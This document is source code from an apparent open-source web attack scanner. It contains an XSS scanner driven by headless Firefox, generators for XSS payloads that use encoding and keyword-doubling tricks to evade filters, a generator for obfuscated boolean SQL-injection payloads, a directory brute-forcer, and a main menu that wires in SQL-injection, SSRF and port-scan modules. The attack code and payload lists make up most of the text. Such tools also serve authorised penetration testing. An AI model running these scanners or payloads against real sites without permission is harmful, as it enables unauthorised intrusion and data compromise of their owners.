'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
self.payload_num=payload_num
self.if_tags=0
self.if_attribute=0
self.if_dom=0
self.if_click_dom = 0
self.if_mouse_dom =0
self.tem_payload = "~88868666~"
self.firefox_options=Options()
self.firefox_options.headless = True
self.queue_ = queue.Queue()
self.thread_num = thread_num
self.tem_payload_num=0
self.dom_arr=[]
def judge_tag(self):
payload = "<test0>"+ self.tem_payload + "</test0>"
url = self.url.replace("*",payload)
result = requests.get(url,headers = self.headers).text
#print("[1]" + result)
m = re.search(r"(<.*>)*[^\"]<test0>.*</test0>",result)
if m:
tag = m.group(1)
if tag:
#print("[3]"+tag)
self.if_tags=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]tags can be injected\n")
return tag
else:
self.if_tags=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]tags can be injected\n")
return 0
else:
return 0
def judge_attribute(self):
payload =self.tem_payload + "\">"
url = self.url.replace("*",payload)
result = requests.get(url,headers = self.headers).text
#print("[2]" + result)
m = re.search(r"<[a-z]+ ([a-z]*)=\"~88868666~\">",result)
if m:
attribute = m.group(1)
#print("[4]"+attribute)
self.if_attribute=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]attribute can be injected\n")
return attribute
else:
return 0
def judge_dom(self):
url = self.url.replace("*",self.tem_payload)
browser = webdriver.Firefox(options=self.firefox_options)
browser.get(url)
result = browser.page_source
#print("[7]" + result)
if self.tem_payload in result and ("location.search" in result or "document.location.href" in result) and ("document.write" in result or "appendChild" in result or "innerHTML" in result):
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_dom=1
return 1
clickList = browser.find_elements_by_xpath("//*[@onclick]")
mouseList = browser.find_elements_by_xpath("//*[@onmousemove]")
if clickList:
for tag in clickList:
ActionChains(browser).move_to_element(tag).click(tag).perform()#模拟点击
result = browser.page_source
if self.tem_payload in result:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_click_dom = 1
return 1
if mouseList:
for tag in mouseList:
ActionChains(browser).move_to_element(tag).perform()#模拟鼠标移动
result = browser.page_source
if self.tem_payload in result:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_mouse_dom = 1
return 1
def payload_in_queue(self):
self.tag_pre = self.judge_tag();
self.pre_attribute = self.judge_attribute();
if_dom = self.judge_dom()
if(self.if_tags == 1):
tag_dict = "xss/tag_payload.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
if(self.if_attribute == 1):
tag_dict = "xss/attr_payload.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
if(self.if_dom == 1 or self.if_click_dom == 1 or self.if_mouse_dom == 1):
tag_dict = "xss/dom_dict.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
def tag_scan(self):
while not self.queue_.empty():
payload = self.queue_.get()
payload_ = quote(payload,"utf-8")
if self.tag_pre == 0:
url = self.url.replace("*",payload_)
elif re.match(r"title|textarea|math|iframe|xmp|plaintext",self.tag_pre[1:len(self.tag_pre)-1]):#闭合特殊标签
payload = self.tag_pre[0] + "/" + self.tag_pre[1:] + payload
url = self.url.replace("*",payload_)
else:
url = self.url.replace("*",payload_)
browser = webdriver.Firefox(options=self.firefox_options)#options=self.firefox_options
try:
browser.get(url)
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
#browser.close()
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def attribute_scan(self):
while not self.queue_.empty():
payload_ = self.queue_.get()
#payload_ = quote(payload,"utf-8")
url = self.url.replace("*",payload_)
#print("[8] {}".format(url))
browser = webdriver.Firefox(options=self.firefox_options)
try:
browser.get(url)
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload_))
self.tem_payload_num +=1
#browser.close()
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def dom_scan(self):
while not self.queue_.empty():
payload = self.queue_.get()
url = self.url.replace("*",payload)
browser = webdriver.Firefox(options=self.firefox_options)
try:
browser.get(url)
if self.if_click_dom:
tags = browser.find_elements_by_xpath("//*[@onclick]")
for tag in tags:
ActionChains(browser).move_to_element(tag).click(tag).perform()
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
elif self.if_mouse_dom:
tags = browser.find_elements_by_xpath("//*[@onmousemove]")
for tag in tags:
ActionChains(browser).move_to_element(tag).perform()
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def run(self):
self.payload_in_queue()
#print("[5]%d" % self.if_attribute)
#print("[6]%d" % self.if_tags)
if self.if_attribute:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.attribute_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if self.if_tags:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.tag_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if self.if_dom or self.if_click_dom or self.if_mouse_dom:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.dom_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,661 | PanDa1G1/sunsecScanner | refs/heads/master | /src/scan.py | import asyncio
import time
import aiohttp
from aiohttp import ClientSession
from urllib import parse
from src._print import _print
class path_scan(object):
def __init__(self,url,max_num,dictory):
self.url = url
self.dictory = dictory
self.count = 0;
self.loop = asyncio.get_event_loop()
self.tasks = []
self.coroutine_num = int(max_num)
self.queue = asyncio.Queue()
self._print = _print()
self.session = ClientSession(loop=self.loop)
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
def make_url(self,url):
parts = parse.urlparse(self.url)
scheme = parts[0]
if scheme == '':
self.url = 'http://' + self.url
if self.url[-1:] != '/':
self.url += '/'
full_url = str(self.url) + str(url)
return full_url
async def get_response(self,url,allow_redirects=True):
return await self.session.get(url,headers = self.headers,allow_redirects=allow_redirects)
async def scan(self):
while True:
if not self.queue.empty():
url = await self.queue.get()
full_url = self.make_url(url)
self.count += 1
try:
response = await self.get_response(full_url)
self._print.print_process((self.count / self.length)*100,url)
code = response.status
if code == 200:
self._print.print_succ(url)
continue
if code == 404:
continue
if code == 403:
#self._print.print_forbidden(url)
continue
if code == 401:
self._print.print_401(url)
continue
if code == 302 or code == 301:
#jump_url = response.location
#self._print.print_forbidden(url,jump_url,code)
continue
except:
await self.session.close()
pass
else:
await self.session.close()
break
def make_cor(self):
self.tasks = [self.scan() for i in range(self.coroutine_num)]
return self.loop.run_until_complete(asyncio.wait(self.tasks))
def get_dir(self):
with open(self.dictory,'r') as f:
while True:
url = f.readline().strip()
if url:
self.queue.put_nowait(url)
else:
break
self.length = self.queue.qsize()
def start(self):
self._print.print_info("Start scan path : %s" % time.strftime("%H:%M:%S"))
self.get_dir()
self.make_cor()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,662 | PanDa1G1/sunsecScanner | refs/heads/master | /xss/make_payload.py | # -*- coding: UTF-8 -*-
from urllib.parse import quote
class make_payload():
def __init__(self):
self.tag_file = "tag_payload.txt"
self.attribute_file = "attr_payload.txt"
self.payload="alert(668868)"
self.protocal = "javascript:"
def js_encode(self,sentence):
payload = ""
for char_ in sentence:
payload += "\\u00" + hex(ord(char_))[2:]
return payload
def html_encode(self,sentence):
payload = ""
for char_ in sentence:
payload += "&#x" + hex(ord(char_))[2:]
return payload
def url_encode(self,sentence):
payload = ""
for char_ in sentence:
payload += "%" + hex(ord(char_))[2:]
return payload
def make_tag(self):
payload_arr = ["<script>*;</script>","<img src=\"1\" onerror=*>","<svg onload=*>","<iframe src=\"http://baidu.com\" onload=*></iframe>","<details open ontoggle=\"*\">","<select autofocus onfocus=*>"
,"<marquee onstart=*>","<audio src onloadstart=*","<video src=\"_\" onloadstart=\"*\">","<video><source onerror=\"javascript:*\">","<keygen autofocus onfocus=*>"]
with open(self.tag_file,"w") as f:
for i in payload_arr:
tem_payload=self.js_encode(self.payload[:5])# js加密函数名
f.write(i.replace("*",self.payload)+"\n")
f.write(i.replace("*",self.payload).replace(" ","/")+"\n")# 空格--> /
f.write(i.replace("*",self.payload).replace("(","`").replace(")","`")+"\n") #() ---> ``
#unicode 加密
f.write(i.replace("*",tem_payload+"(668868)").replace(" ","/")+"\n")
f.write(i.replace("*",tem_payload+"(668868)")+"\n")
f.write((i.replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`").replace(" ","/"))+"\n")
f.write((i.replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`"))+"\n")
#重叠
f.write(i.replace("script","scscriptript").replace("*",self.payload)+"\n")
f.write(i.replace("script","scscriptript").replace("*",self.payload).replace(" ","/")+"\n")# 空格--> /
f.write(i.replace("*",self.payload).replace("script","scscriptript").replace("(","`").replace(")","`")+"\n") #() ---> ``
f.write(i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace(" ","/")+"\n")
f.write(i.replace("script","scscriptript").replace("*",tem_payload+"(668868)")+"\n")
f.write((i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`").replace(" ","/"))+"\n")
f.write((i.replace("script","scscriptript").replace("*",tem_payload+"(668868)").replace("(","`").replace(")","`"))+"\n")
def make_attribute(self):
with open(self.attribute_file,"w") as f:
#on事件
f.write(self.payload+"\n")
f.write(self.html_encode(self.payload)+"\n")
f.write(self.html_encode(self.payload).replace("(","`").replace(")","`")+"\n")
f.write(self.js_encode(self.payload[:5])+"(668868)"+"\n")
f.write((self.js_encode(self.payload[:5])+"(668868)").replace("(","`").replace(")","`")+"\n")
f.write(self.html_encode(self.protocal + self.js_encode(self.payload[:5])+"(668868)")+"\n")
f.write(self.html_encode(self.protocal + self.js_encode(self.payload[:5])+"(668868)").replace("(","`").replace(")","`" + "\n"))
# 添加location属性,可以进行url编码
f.write("=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)"))
f.write("=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`"))
f.write("=location=\"{}{}\">\n".format(self.protocal,self.url_encode(self.payload)))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)"))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`"))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.payload))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)")))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`")))
f.write("=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload))))
#src等属性
f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)"))
f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`"))
f.write("\" onerror=location=\"{}{}\">\n".format(self.protocal,self.url_encode(self.payload)))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)"))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`"))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.url_encode(self.payload)))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)")))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`")))
f.write("\" onerror=location=\"{}{}\">\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload))))
f.write("{}{}\n".format(self.protocal,self.js_encode(self.payload[:5])+"(668868)" + ">"))
f.write("{}{}\n".format(self.protocal,self.js_encode(self.payload[:5])+"`668868`" + ">"))
f.write("{}{}\n".format(self.protocal,self.url_encode(self.payload)))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"(668868)" + ">"))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.js_encode(self.payload[:5])+"`668868`" + ">"))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.url_encode(self.payload) + ">"))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"(668868)" + ">")))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.js_encode(self.payload[:5])+"`668868`" + ">")))
f.write("{}{}\n".format(self.html_encode(self.protocal),self.html_encode(self.url_encode(self.payload + ">"))))
if __name__ == '__main__':
a = make_payload()
#a.make_tag()
a.make_attribute() | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,663 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/make_dict/make_boolen_dict.py | # -*- coding: UTF-8 -*-
a = [("and","AnaNdd"),("suBstr","Mid"),("oR","ooRR"),("select","SELSEleCtect"),("aScii","aSciaSciii"),("suBstr","subSuBstrstr")]
pre_ = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
stuff_ = ["#","-- ","and('1')='1","and('1')=\"1","and('1')=('1","and('1')=(\"1","and('1')=(('1","and('1')=((\"1","and('1')='(1","and('1')='((1","and('1')=\"((1","and('1')=\"(1"]
payload1 = "^(suBstr('867546968',2,1)=6)^1='0'"
payload2 = "oR((SEleCt(suBstr('867546968',2,1)))=6)"
payload3 = "oR!(sEleCt(suBstr('867546268',2,1))<>6)"
payload4 = "oR((SEleCt(aScii(suBstr('867546938',2,1))))=54)"
payload5 = "^(aScii(suBstr('867546968',2,1))=64)^1='0'"
with open("../payload/Boolen.txt","a+") as f:
for pre in pre_:
for stuff in stuff_:
f.write(pre+payload1+stuff+ "\n")
f.write(pre+payload2+stuff + "\n")
f.write(pre+payload3+stuff+ "\n")
f.write(pre+payload4+stuff+"\n")
f.write(pre+payload5+stuff+ "\n")
#1
for i in range(len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]) + "\n")
#2
for i in range(len(a)):
for j in range(i + 1,len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
#3
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
#4
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
for l in range(k+1,len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
#5
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
for l in range(k+1,len(a)):
for m in range(l+1,len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
#6
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
for l in range(k+1,len(a)):
for m in range(l+1,len(a)):
for n in range(m+1,len(a)):
f.write((pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]).replace(a[n][0],a[n][1]) + "\n")
f.write((pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]).replace(a[n][0],a[n][1]) + "\n")
f.write((pre+payload3+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]).replace(a[n][0],a[n][1]) + "\n")
f.write((pre+payload4+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]).replace(a[n][0],a[n][1]) + "\n")
f.write((pre+payload5+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]).replace(a[n][0],a[n][1]) + "\n")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,664 | PanDa1G1/sunsecScanner | refs/heads/master | /src/_print.py | import colorama
from colorama import Fore, Style, Back
import platform
import sys
import os
class _print():
def __init__(self):
self.terminal_size = os.get_terminal_size().columns
self.system = platform.system()
self.lastInLine = False
def inLine(self, string):
self.lastInLine = True
if len(string) > self.terminal_size:
string = "\r" + string[:self.terminal_size - 8] + "..." + Style.RESET_ALL + "\r"
string = ("\r" + string + Style.RESET_ALL) + "\r"
sys.stdout.write(string)
sys.stdout.flush()
def new_line(self, message, nowrap=False):
if self.lastInLine:
self.erase()
if self.system == 'Windows':
sys.stdout.write(message)
sys.stdout.flush()
else:
sys.stdout.write(message)
if not nowrap:
sys.stdout.write('\n')
sys.stdout.flush()
self.lastInLine = False
def print_process(self,present,url):
self.inLine(
Fore.LIGHTYELLOW_EX + '[~] {:2.1f}% [{:<50}] {}'.format(present if present < 100 else 99.9,
"=" * int(present // 2) + (
">" if present < 100 else ""), url).ljust(
self.terminal_size - 5, " "))
def print_forbidden(self,url):
self.new_line(Fore.LIGHTRED_EX + '[-] 403\t\t{}'.format(url))
def print_401(self,url):
self.new_line(Fore.LIGHTBLUE_EX + '[-] 401\t\t{}'.format(url))
def print_succ(self,url):
self.new_line(Fore.LIGHTGREEN_EX + '[*] 200\t\t{}'.format(url))
def print_info(self, message, **kwargs):
if self.system == "Windows":
self.new_line(Fore.LIGHTYELLOW_EX + Style.NORMAL + "[~] {0}".format(message) + Style.RESET_ALL, **kwargs)
else:
self.new_line(Fore.LIGHTGREEN_EX + Style.NORMAL + "[~] {0}".format(message) + Style.RESET_ALL, **kwargs)
def erase(self):
if self.system == 'Windows':
sys.stdout.write(Style.RESET_ALL + '\r' + ' ' * (self.terminal_size - 2) + '\r')
sys.stdout.flush()
else:
sys.stdout.write('\033[1K')
sys.stdout.write('\033[0G')
sys.stdout.flush()
def print_end(self,time,issue):
self.new_line(Fore.LIGHTYELLOW_EX + "[~] {} finished! time spent {}s {} {}".format(issue,time,' '*50,'\n'))
def check_sess(self,url,name):
self.new_line(Fore.LIGHTGREEN_EX + '[*] ' + Fore.LIGHTGREEN_EX + '{}'.format(name) + Fore.LIGHTGREEN_EX +' is existed in'+ Fore.LIGHTGREEN_EX +' {}'.format(url))
def port_end(self,time):
self.new_line(Fore.LIGHTYELLOW_EX + '[~] finshed! time spent {}s'.format(time))
def port_fail(self,port,state):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: '.format(port) + Fore.LIGHTRED_EX + '{} {}'.format(state,'\n'))
def port_sess(self,port,state):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: {} {}'.format(port,state,'\n'))
def port_res(self,port,state,service):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] port: {}\t\tstate: {}\tservice: {}\n'.format(port,state,service))
def fuzz_res(self,param,value):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] param:{}\t\tvlaue:{}\n'.format(param,value))
def ip_res(self,ip):
sys.stdout.write(Fore.LIGHTGREEN_EX + '[*] ip: {}\t\tstate:up\n'.format(ip))
def start_scan(self,type):
sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]start checking {} inject......\n".format(type))
def sql_stop(self):
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,665 | PanDa1G1/sunsecScanner | refs/heads/master | /main.py | from src.scan import path_scan
from src._print import _print
import argparse
from src.finger_scan import FingerScan
from src.PortScan import myThread
from src.fuzz import Fuzz
import time
from src.Ipscan import Ipscan
from sql_injection.union import ScanUnion
from sql_injection.error_inject import error_inject
from sql_injection.Boolen_scan import Boolen_Scan
from sql_injection.time_scan import Time_scan
from xss.xss_scan import xss_Scanner
from ssrf.ssrf import ssrfScan
import sys
class menu():
def __init__(self):
self._print = _print()
def get_input(self):
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', dest="scan_url", help="url for scanning", type=str)
parser.add_argument('-n', '--num', dest="coroutine_num", help="coroutines num you want to use default:10", type=str,default = 10)
parser.add_argument('-d', '--dictory', dest="dictory", help="dictory you want to use", type=str,default = 'directroy/dirList.txt')
parser.add_argument('-s', '--sqlit',dest="sqlite_file", help="datebase file you want to use", type=str,default = 'database/web.db')
parser.add_argument('-p', '--path_scan',dest="path_scan", help="scan the path eg: -u [url] -p 1 [-d directroy -n num]", type=str,default = False)
parser.add_argument('-f', '--finger_scan',dest="finger_scan", help="scan the finger eg: -u [url] -f 1 [-s xx.db]", type=str,default = False)
parser.add_argument('-P', '--port_scan',dest="port_scan", help="scan port \n\r eg: -u [host] -P [1-65535] or [22,33,88,77] or 22 [-t]", type=str,default = False)
parser.add_argument('-t', '--thread_num',dest="thread_num", help="the number of thread default:100", type=int,default = 100)
parser.add_argument('-F', '--fuzz',dest="fuzz", help="http://url?fuzz=fuzz or http://url?file=fuzz", type=str,default = False)
parser.add_argument('-sP', '--Ipscan',dest="Ipscan", help="xxx.xxx.xxx.0/24 or /16 or /8", type=str,default = False)
parser.add_argument('--method', '--method',dest="sql_method", help="method to request", type=str,default = "GET")
parser.add_argument('-r', '--headerFile',dest="header_file", help="header file,post request", type=str,default = False)
parser.add_argument('--sql', '--sql',dest="sql_scan", help="whether to scan sqlinjection ", type=str,default = False)
parser.add_argument('--union', '--union',dest="union_scan", help="union scan ", type=str,default = False)
parser.add_argument('--error', '--error',dest="error_scan", help="error scan ", type=str,default = False)
parser.add_argument('--Boolen', '--Boolen',dest="Boolen_scan", help="Boolen scan ", type=str,default = False)
parser.add_argument('--true_string', '--true_string', dest="true_string", help="if payload is true,the string that will in page", type=str,default = "")
parser.add_argument('--false_string', '--false_string', dest="false_string", help="tif payload is False,the string that will in page", type=str,default = "")
parser.add_argument('--time', '--time',dest="time_scan", help="Boolen scan ", type=str,default = False)
parser.add_argument('--wait_time', '--wait_time',dest="wait_time", help="wait_time ", type=int,default = 5)
